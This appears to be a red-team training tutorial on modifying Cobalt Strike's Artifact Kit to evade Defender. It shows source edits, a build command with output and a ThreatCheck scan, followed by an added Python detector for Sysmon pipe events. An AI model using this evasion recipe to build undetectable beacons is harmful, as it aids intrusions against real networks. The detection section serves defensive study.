Arsenal Kit

Cobalt Strike uses the Artifact Kit to generate its executables and DLLs. The Artifact Kit is part of the Arsenal Kit, which bundles a collection of kits: a source-code framework for building executables and DLLs that evade some antivirus products.

The patch.c code must be modified for the AV bypass to work, because Defender is constantly updated to detect the stock binaries. The simplest approach with the Arsenal Kit is to modify the following lines.

Modify this part of the code.

/opt/CS491/arsenal-kit/kits/artifact/src-common/patch.c
   /* decode the payload with the key */
   for (int c = 0; c < length; c += 8) {
      for (int i = 0; i < 8 && (c + i) < length; i++) {
          char *y = (char *)ptr + c + i;
          char *r = (char *)buffer + c + i;
  
          // Random operation (assuming it's needed, unchanged)
          GetVersion();
  
          *y = *r ^ key[(c + i) % 8];  // XOR operation with key
      }
  }

Modify the following file.

/opt/CS491/arsenal-kit/kits/artifact/src-common/bypass-pipe.c
void start(HINSTANCE mhandle) {
   /* switched from snprintf... as some A/V product was flagging based on the function *sigh*
      92, 92, 46, 92, 112, 105, 112, 101, 92 is \\.\pipe\
   */
   sprintf(pipename, "%c%c%c%c%c%c%c%c%cdoom\\s", 92, 92, 46, 92, 112, 105, 112, 101, 92);

   /* start our server and our client */

Compile the artifact.

┌──(root㉿kali)-[/opt/CS491/arsenal-kit/kits/artifact]
└─# ./build.sh pipe VirtualAlloc 310272 5 false false none /opt/CS491/artifacts 
[Artifact kit] [+] You have a x86_64 mingw--I will recompile the artifacts
[Artifact kit] [*] Using allocator: VirtualAlloc
[Artifact kit] [*] Using STAGE size: 310272
[Artifact kit] [*] Using RDLL size: 5K
[Artifact kit] [*] Using system call method: none
[Artifact kit] [+] Artifact Kit: Building artifacts for technique: pipe
[Artifact kit] [*] Recompile artifact32.dll with src-common/bypass-pipe.c
[Artifact kit] [*] Recompile artifact32.exe with src-common/bypass-pipe.c
[Artifact kit] [*] Recompile artifact32svc.exe with src-common/bypass-pipe.c
[Artifact kit] [*] Recompile artifact32big.dll with src-common/bypass-pipe.c
[Artifact kit] [*] Recompile artifact32big.exe with src-common/bypass-pipe.c
[Artifact kit] [*] Recompile artifact32svcbig.exe with src-common/bypass-pipe.c
[Artifact kit] [*] Recompile artifact64.x64.dll with src-common/bypass-pipe.c
[Artifact kit] [*] Recompile artifact64.exe with src-common/bypass-pipe.c
[Artifact kit] [*] Recompile artifact64svc.exe with src-common/bypass-pipe.c
[Artifact kit] [*] Recompile artifact64big.x64.dll with src-common/bypass-pipe.c
[Artifact kit] [*] Recompile artifact64big.exe with src-common/bypass-pipe.c
[Artifact kit] [*] Recompile artifact64svcbig.exe with src-common/bypass-pipe.c
[Artifact kit] [+] The artifacts for the bypass technique 'pipe' are saved in '/opt/CS491/artifacts/pipe'

We verify that our artifact is not detected using ThreatCheck. The name artifact64svcbig.exe indicates the stageless service executable.

C:\Tools\ThreatCheck\ThreatCheck\bin\Debug\ThreatCheck.exe -f  C:\Payloads\artifacts\pipe\artifact64svcbig.exe
[+] No threat found!
[*] Run time: 0.72s

Finally, we generate our beacons and run and test them in a Windows environment.
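From the defender's side, the bypass-pipe.c change above only renames the named pipe the artifact creates, and a Sysmon pipe-creation event (Event ID 17) or pipe-connected event (Event ID 18) still records that name. The following is an added example, not code from the page or from the Arsenal Kit: a Python triage over constructed Sysmon pipe events that flags pipe names outside an assumed allowlist and matches the custom name set on this page. The log line format, allowlist and image paths are assumptions made for the example.

```python
import re

# Constructed sample Sysmon pipe events (EventID 17 = Pipe Created,
# 18 = Pipe Connected), reduced to the fields this check needs.
# Paths and pipe names are made up; "\doom\s" is the name set in the
# modified bypass-pipe.c on this page ("\\.\pipe\" prefix + "doom\s").
SAMPLE_EVENTS = [
    r'EventID="17" Image="C:\Windows\System32\svchost.exe" PipeName="\lsass"',
    r'EventID="17" Image="C:\Windows\Temp\artifact64svcbig.exe" PipeName="\doom\s"',
    r'EventID="18" Image="C:\Windows\Temp\artifact64svcbig.exe" PipeName="\doom\s"',
    r'EventID="17" Image="C:\Program Files\App\app.exe" PipeName="\\.\pipe\app-ipc"',
    r'EventID="17" Image="C:\Users\Public\updater.exe" PipeName="\updater-1234"',
]

# Assumed allowlist of pipe names this environment expects (constructed).
EXPECTED_PIPES = {"lsass", "app-ipc"}

# Pipe name taken from the modified bypass-pipe.c on this page, normalised.
KNOWN_CUSTOM = {r"doom\s"}

FIELD_RE = re.compile(r'(\w+)="([^"]*)"')
# Strip an optional "\\.\pipe" prefix and the leading backslash Sysmon logs.
PREFIX_RE = re.compile(r'^(?:\\\\\.\\pipe)?\\', re.IGNORECASE)


def parse_event(line):
    """Turn one key="value" log line into a dict of its fields."""
    return dict(FIELD_RE.findall(line))


def normalize_pipe(name):
    """Reduce "\\.\pipe\name" or "\name" to a lowercase bare pipe name."""
    return PREFIX_RE.sub("", name, count=1).lower()


def classify(event):
    """Return (verdict, pipe) for pipe events, None for anything else."""
    if event.get("EventID") not in ("17", "18"):
        return None
    pipe = normalize_pipe(event["PipeName"])
    if pipe in KNOWN_CUSTOM:
        return ("known-bad", pipe)
    if pipe in EXPECTED_PIPES:
        return ("expected", pipe)
    return ("unknown", pipe)


def triage(lines):
    """Collect (EventID, Image, pipe, verdict) for every non-expected pipe."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        verdict = classify(ev)
        if verdict and verdict[0] != "expected":
            findings.append((ev["EventID"], ev["Image"], verdict[1], verdict[0]))
    return findings
```

Sysmon only logs pipe events when its configuration enables them, so the check assumes a ruleset that includes PipeEvent.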

References

https://training.zeropointsecurity.co.uk/courses/take/red-team-ops/texts/37495050-artifact-kit